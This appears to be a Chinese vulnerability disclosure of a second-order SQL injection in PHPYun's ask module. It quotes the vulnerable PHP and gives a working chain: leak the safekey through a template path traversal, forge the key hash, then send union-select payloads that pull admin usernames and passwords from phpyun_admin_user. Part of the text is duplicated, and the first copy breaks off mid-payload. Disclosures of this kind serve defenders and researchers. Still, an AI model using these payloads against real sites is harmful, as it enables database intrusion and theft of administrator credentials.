<ul><li>/ask/model/index.class.php</li></ul><pre class="">$i_ids=$is_set['ids'].','.$_POST['id']; $n_id=$this->obj->update_once("attention",array("ids"=>$i_ids),array("id"=>$is_set['id'])); if($n_id) { $data['uid']=$this->uid; $data['content']=$content; $data['ctime']=time(); $this->obj->insert_into("friend_state",$data); echo '1'; }else{ echo '0'; } $i_ids拼接用戶POST的id。 function attenquestion_action() { if($this->uid=='') { $this->obj->ACT_msg($_SERVER['HTTP_REFERER'],"请先登录!"); } $this->public_action(); $ids=$this->obj->DB_select_once("attention","`uid`='".$this->uid."' and `type`='1'","`ids`"); $ids=rtrim($ids['ids'],','); $pageurl=$this->aurl(array("url"=>"c:".$_GET['c'].",page:{{page}}")); $question=$this->get_page("question","`id` in (".$ids.") order by `add_time` desc",$pageurl,"10"); </pre><p>将ids取出,拼接进入SQL语句导致二次注入。当用户提交:</p><pre class="">type=1&id=2) and 1=2 union select...
<ul><li>/ask/model/index.class.php</li></ul><pre class="">$i_ids=$is_set['ids'].','.$_POST['id']; $n_id=$this->obj->update_once("attention",array("ids"=>$i_ids),array("id"=>$is_set['id'])); if($n_id) { $data['uid']=$this->uid; $data['content']=$content; $data['ctime']=time(); $this->obj->insert_into("friend_state",$data); echo '1'; }else{ echo '0'; } $i_ids拼接用戶POST的id。 function attenquestion_action() { if($this->uid=='') { $this->obj->ACT_msg($_SERVER['HTTP_REFERER'],"请先登录!"); } $this->public_action(); $ids=$this->obj->DB_select_once("attention","`uid`='".$this->uid."' and `type`='1'","`ids`"); $ids=rtrim($ids['ids'],','); $pageurl=$this->aurl(array("url"=>"c:".$_GET['c'].",page:{{page}}")); $question=$this->get_page("question","`id` in (".$ids.") order by `add_time` desc",$pageurl,"10"); </pre><p>将ids取出,拼接进入SQL语句导致二次注入。当用户提交:</p><pre class="">type=1&id=2) and 1=2 union select 1,md5(135148),3,4,5,6,7,8,9,10%23&safekey=5a48350556731e96b1ac590dda8db00c</pre><p>执行的SQL语句为:</p><pre class="">SELECT * FROM `phpyun_question` WHERE `id` in (2,2) and 1=2 union select 1,md5(135148),3,4,5,6,7,8,9,10#,2' and 1=2 union select 1,md5(135148),3,4,5,6,7,8,9,10#) order by `add_time` desc limit 0,10</pre><p>页面返回: </p><p><img alt="C9E66116-678C-42A4-B1E1-383F7A4BF884.png" src="https://images.seebug.org/@/uploads/1434694157752-C9E66116-678C-42A4-B1E1-383F7A4BF884.png" data-image-size="669,177"><br></p><p>申请企业帐号,记住uid(我这里uid为6),然后访问:</p><pre class="">http://10.211.55.3/phpyun/company/index.php?m=index&c=index&id=6&style=../../template/admin&tp=/admin_web_config</pre><p>获取到safekey: </p><p><img alt="66BA656D-C8DF-47C0-BD68-0FCF1484D80E.png" src="https://images.seebug.org/@/uploads/1434694185455-66BA656D-C8DF-47C0-BD68-0FCF1484D80E.png" data-image-size="658,64"><br></p><p>计算:md5(md5(safekey).'index'),计算结果为:</p><pre class="">5a48350556731e96b1ac590dda8db00c</pre><p>在地址:</p><pre class="">http://10.211.55.3/phpyun/ask/index.php?c=addquestion</pre><p>提问问题,记住问题id(我这里为14),然后退出帐号。</p><p><img alt="363FC513-EC73-4575-B9D7-CD71F1A5D98D.png" src="https://images.seebug.org/@/uploads/1434694259376-363FC513-EC73-4575-B9D7-CD71F1A5D98D.png" data-image-size="509,166"><br></p><p>再次申请一个账号,然后发送两次POST包到:</p><pre class="">http://10.211.55.3/phpyun/ask/index.php/admin/?m=index&c=attention</pre><p>内容为:</p><pre class="">type=1&id=14) and 1=2 union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from phpyun_admin_user%23&safekey=5a48350556731e96b1ac590dda8db00c</pre><p>访问地址:</p><pre class="">http://10.211.55.3/phpyun/ask/index.php?c=attenquestion</pre><p>得到admin的帐号以及密码: </p><p><img alt="E9BB2942-DA8F-408B-925D-903A7271450A.png" src="https://images.seebug.org/@/uploads/1434694281727-E9BB2942-DA8F-408B-925D-903A7271450A.png" data-image-size="659,198"><br></p>
